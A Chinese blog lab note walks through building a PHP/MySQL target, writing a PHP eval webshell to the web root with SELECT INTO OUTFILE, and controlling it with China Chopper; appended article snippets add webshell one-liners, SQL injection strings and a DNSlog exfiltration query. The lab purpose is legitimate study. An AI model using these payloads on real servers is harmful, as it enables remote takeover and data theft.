一句话木马SQL注入

已于 2022-08-26 10:15:05 修改
阅读量2.8k 收藏 12
点赞数 3
分类专栏: 笔记 文章标签: sql php apache
于 2022-08-25 21:13:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46065653/article/details/126518555
版权

目录

1.搭建靶机环境

(1)实验环境及思路

靶机:centos7 以安装好MySQL服务
攻击机:win7
使用工具:Navicat、wireshark、菜刀

(2)搭建靶机环境

  • (1)firewall-cmd --zone=public --add-port=80/tcp --permanent 开80端口

  • systemctl restart firewalld.service 重启防火墙

  • 确保已安装好MySQL在这里插入图片描述

  • (2)rpm -ivh mysql-community-libs-compat-5.7.30-1.el7.x86_64.rpm安装php所需要的依赖环境
    在这里插入图片描述

  • (3)yum install php php-mysql -yyum安装php
    在这里插入图片描述
    在这里插入图片描述

  • (4)yum -y install httpd*为其安装Apache服务
    在这里插入图片描述在这里插入图片描述

  • (5)vi /etc/httpd/conf/httpd.conf修改apache配置文件

  • 在配置文件中修改如下,添加如下内容

  • AddType application/x-httpd-php-source .phps——apache能过够解析phps文件

  • AddType application/x-httpd-php .php——apache能过够解析php文件
    在这里插入图片描述

  • (6)cd /var/www/html apache网站的根目录

  • vi phpinfo.php

  • <? php phpinfo(); ?>编写php文件,配置php网站,这是条php语句

  • systemctl restart httpd重启apache服务
    在这里插入图片描述在这里插入图片描述

  • (6)localhost/phpinfo.phpfirefox中输入可以访问代表网站服务搭建成功
    在这里插入图片描述

2.用Navicat构建一句话SQL注入木马

show databases;
create database TEST;
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','"','mimi','"',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php'

在这里插入图片描述

3.通过菜刀连接靶机

  • cd /var/www/html

在这里插入图片描述

  • ifconfig查看靶机IP
    在这里插入图片描述
  • 使用win7上的菜刀工具进行连接
    在这里插入图片描述
    在这里插入图片描述
  • 双击进入,可以看到我们已经成功进入到靶机的数据库中
    在这里插入图片描述
  • 我们可以用Wireshark来抓取菜刀的流量包,靶机记得开启apache服务
  • systemctl start httpd
  • 启用wireshark,然后用菜刀访问我们所写入的木马文件ma.php
  • wireshark启用流量过滤,方便我们找到菜刀的流量包
  • ip.addr == 192.168.8.141 and http
    在这里插入图片描述
    在这里插入图片描述
jr 野良
关注
专栏目录
SQL 注入一句话木马
jingshuishenlong的专栏
03-31 350
SQL 注入一句话木马 环境:CentOS5.5 apache MySQL php 一、环境搭建 1、安装CentOS5.5 安装VMware15虚拟机;新建CPU1核、内存2G、硬盘20G、网卡桥接、光驱连接centOS5.5光盘镜像文件;安装好后登录密码是root/123456 2、安装apache cd /media/CentOS_5.5_Final/CentOS #进入到centos光盘自带的rpm包目录下 ls | grep httpd ...
22-2.1 get基于报错的sql注入利用-读敏感文件和写入一句话木马
weixin_43263566的博客
01-25 261
通过这个查询语句,攻击者尝试将一段包含恶意PHP代码的字符串写入到一个指定的文件中,从而创建一个后门(backdoor)程序,可以让攻击者对受害者的服务器进行远程控制和操作。这是一个恶意的SQL注入攻击,它使用UNION注入的方式向数据库中插入一段包含恶意PHP代码的字符串,并将其存储到指定的文件中。因为我也不知道靶场的敏感文件是哪个,所以我就读取我们刚才注入的木马文件。判断MysQL的存储路径方便我们写入一句话马。双击刚才创建的连接就能进入目标的文件管理界面。在现实的情况下这种注入手段成功率很低。
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9378
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
SQL注入篇——一句话木马
爱国小白帽
01-08 6497
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
sql注入的万能语句
最新发布
2301_80143258的博客
08-17 206
当我们输入正确的用户名与密码就可以登陆进去,但是这个验证机制也可以通过SQL语句来构造特殊的字符串来通过验证。name就是输入的用户名,pwd 就是输入的密码(“$”表示变量,存储)”where“表示条件,为真则执行,验证成功,为假则不执行,验证失败。"or"是或的意思,根据离散数学的逻辑判断规则,可知一真一假为真,输入用户名:“username"输入密码:”password"再例如:1’or 1=1 #查询出表中所有的字段。
sql注入一句话木马
告白的博客
07-09 3316
0x00 sql注入一句话木马 首先介绍一下一句话木马一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马php一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
sql注入之into outfile语句写入一句话木马
m0_63436163的博客
01-26 1829
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
SQL注入上传一句话木马
buffedon的博客
05-31 9917
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
php mysql 注入一句话木马_渗透技术--SQL注入一句话木马原理
weixin_39800387的博客
02-19 2407
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
php mysql 注入一句话木马_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1329
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 8889
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
尝试使用sql注入漏洞手工写入一句话木马
m0_46390077的博客
01-15 908
使用sql注入漏洞手工写入webshell
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1589
SQL注入上传一句话木马
MSSQL注入木马病毒网上横行!
weixin_34126215的博客
11-23 229
昨日朋友一网站感染病毒,导致网站打不开、数据库显示混乱。杀毒软件报毒和网站瘫痪。后来发现是数据库多个表中都注入了&lt;script src=http://cn.jxmmtv.com/cn.js&gt;&lt;/script&gt;一段脚本。真是害人啊!通过分析该段脚本在数据库多个表,是Nchar类型喜欢注入。而且往往都是MSSQL数据库的网站。     于是本人只有用SQL命令逐个恢复数据库表。...
sql注入之into outfile语句写入一句话木马_sql的into outfile
2401_83739411的博客
04-12 653
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
2301_77033340的博客
04-12 571
1、漏洞介绍into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
php mysql 注入一句话木马_PHPSQL语句写一句话木马总结
weixin_30290673的博客
01-28 457
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:二、编码的替换的类型://会生成@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));//php在html内部的一种嵌入方式session_start();$...
sql注入时写一个php木马,SQL注入一句话木马
weixin_39528219的博客
03-23 1109
IP Informationfor 58.55.129.183IP Location China Ezhou Chinanet Hubei Province Network ASN AS4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN (registered Aug 01, 2002) Whois Serverwhois.apnic...
探索一句话木马技术及其实现方式
文件列表中的“一句话木马.txt”表明这个资源可能是以文本格式提供的,内容可能包括一句话木马的技术细节、示例代码、使用方法或者防范建议等。文本文件广泛用于记录和分享信息,因为它们容易编辑、阅读且不需要特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jr 野良

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值